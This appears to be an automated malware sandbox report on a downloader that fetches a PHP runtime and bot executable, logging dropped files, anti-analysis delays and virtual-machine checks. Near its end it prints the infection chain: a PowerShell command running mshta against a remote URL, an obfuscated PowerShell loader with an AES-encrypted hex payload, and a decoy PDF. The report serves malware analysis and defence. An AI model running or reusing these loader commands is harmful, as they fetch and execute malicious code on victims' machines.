ZENDSUBNS\NAMESPACED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_DEPRECATED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_ALIASED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_DEPRECATED_ALIASED_FUNCIS_OBJECT__TOSTRINGRETURNSSTATICRETURNSTHROWABLEVARIADICTESTTESTMETHODNO_OVERRIDEOVERRIDECALLCALLSTATICZEND_TEST_DEPRECATEDGLOBALZEND_CONSTANT_ANAMESPACEDZENDTESTNS2\ZEND_CONSTANT_AZENDTESTNS2\ZENDSUBNS\ZEND_CONSTANT_A_ZENDTESTINTERFACEDUMMY_ZENDTESTCLASS_ZENDTESTCLASSALIAS_STATICPROPSTATICINTPROPINTPROPCLASSPROPCLASSUNIONPROPCOUNTABLECLASSINTERSECTIONPROPREADONLYPROP_ZENDTESTCHILDCLASS_ZENDTESTTRAITTESTPROPZENDTESTATTRIBUTEATTRIBUTEZENDTESTPARAMETERATTRIBUTEZENDTESTPROPERTYATTRIBUTEZENDTESTCLASSWITHMETHODWITHPARAMETERATTRIBUTEZENDTESTCHILDCLASSWITHMETHODWITHPARAMETERATTRIBUTEZENDTESTFORBIDDYNAMICCALLFOOBARZENDTESTSTRINGENUMTEST1TEST2TEST2\ABAZ42FORTYTWOZENDTESTINTENUMZENDTESTNS\FOOZENDTESTNS2\FOOZENDTESTNS2\ZENDSUBNS\FOOFOOPASS1
        Source: php_zend_test.dll.21.dr | Binary or memory string: ZEND_TEST.OBSERVER.EXECUTE_INTERNAL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2106
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1405
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1276
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 649
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5494
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3106
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exe
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exe
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exe
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exe
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dll
        Source: C:\Windows\System32\mshta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dll
        Source: C:\Windows\System32\tar.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | API coverage: 9.0 %
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | API coverage: 2.9 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 | Thread sleep count: 1276 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep count: 649 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7992 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 | Thread sleep time: -17524406870024063s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 9212 | Thread sleep time: -72000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 9212 | Thread sleep time: -330000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 8244 | Thread sleep time: -51000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 8244 | Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Last function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E42110 FindFirstFileExW,12_2_00007FF658E42110
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
        Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CCA4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWdClasserver5
        Source: powershell.exe, 00000007.00000002.1833123657.000001F423E5F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Datacenter Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Datacenter Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Essential Server Solutions Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Standard Edition (without Hyper-V)
        Source: mshta.exe, 00000005.00000003.1885470413.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888760600.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2897796368.000001B97E658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2894827777.000001B97D02B000.00000004.00000020.00020000.00000000.sdmp, php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.00000248770D3000.00000004.00000020.00020000.00000000.sdmp, php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.000002487708D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Enterprise Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Windows 11Windows 10Windows Server 2022Windows Server, version 20H2Windows Server, version 2004Windows Server, version 1909Windows Server, version 1903Windows Server 2019Windows Server, version 1803Windows Server, version 1709Windows Server 2016Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8.1Windows Server 2012 R2Windows 8Windows Server 2012Unknown Windows versionUltimate EditionHome Basic EditionHome Premium EditionEnterprise EditionHome Basic N EditionProfessional EditionBusiness EditionStandard EditionDatacenter EditionSmall Business ServerStarter N EditionStarter EditionDatacenter Edition (core installation)Standard Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsProfessional N EditionBusiness N EditionWeb Server EditionHPC EditionStorage Server Essentials EditionStorage Server Express EditionStorage Server Standard EditionStorage Server Workgroup EditionStorage Server Enterprise EditionEssential Server Solutions EditionSmall Business Server Premium EditionHome Premium N EditionEnterprise N EditionUltimate N EditionWeb Server Edition (core installation)Essential Business Server Management Server EditionEssential Business Server Management Security EditionEssential Business Server Management Messaging EditionFoundation EditionHome Server 2011 EditionEssential Server Solutions Edition (without Hyper-V)Standard Edition (without Hyper-V)Datacenter Edition (without Hyper-V)Enterprise Edition (without Hyper-V)Datacenter Edition (core installation, without Hyper-V)Standard Edition (core installation, without Hyper-V)Enterprise Edition (core installation, without Hyper-V)Hyper-V ServerStorage Server Express Edition (core installation)Storage Server Standard Edition (core installation)Storage Server Workgroup Edition (core installation)Storage Server Enterprise Edition (core installation)Small Business Server 2011 Essentials EditionServer For SB Solutions EditionSolutions Premium EditionSolutions Premium Edition (core installation)Server For SB Solutions EM EditionMultiPoint Server EditionEssential Server Solution Management EditionEssential Server Solution Additional EditionEssential Server Solution Management SVC EditionEssential Server Solution Additional SVC EditionSmall Business Server Premium Edition (core installation)Hyper Core V EditionEnterprise Edition (evaluation installation)MultiPoint Server Standard Edition (full installation)MultiPoint Server Premium Edition (full installation)Standard Edition (evaluation installation)Datacenter Edition (evaluation installation)Enterprise N Edition (evaluation installation)Storage Server Workgroup Edition (evaluation installation)Storage Server Standard Edition (evaluation installation)Windows 8 N EditionWindows 8 China EditionWindows 8 Single Language EditionWindows 8 EditionProfessional with Media Center Editioni%dMIPS R%d000Alpha %dPPC 6%02dIA64IA32AMD64ARM64Windows NTbuild %dbuild %d (%s)%s %s %d.%d build %d (%s)
        Source: powershell.exe, 00000007.00000002.1833123657.000001F423E14000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Enterprise Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Standard Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2892213173.000001E12C0C9000.00000004.00000020.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892485381.0000014E5BB58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: Hyper-V Server
        Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E333E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF658E333E8
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E43384 GetProcessHeap,12_2_00007FF658E43384
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E2DD08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF658E2DD08
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E2DEF0 SetUnhandledExceptionFilter,12_2_00007FF658E2DEF0
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E2DF5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF658E2DF5C
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Code function: 24_2_00007FF7498CC4E4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00007FF7498CC4E4
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Code function: 24_2_00007FF7498CBC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FF7498CBC50
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Code function: 24_2_00007FF7498CC68C SetUnhandledExceptionFilter,24_2_00007FF7498CC68C
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Code function: 24_2_00007FFE1A530468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FFE1A530468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Leng
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"
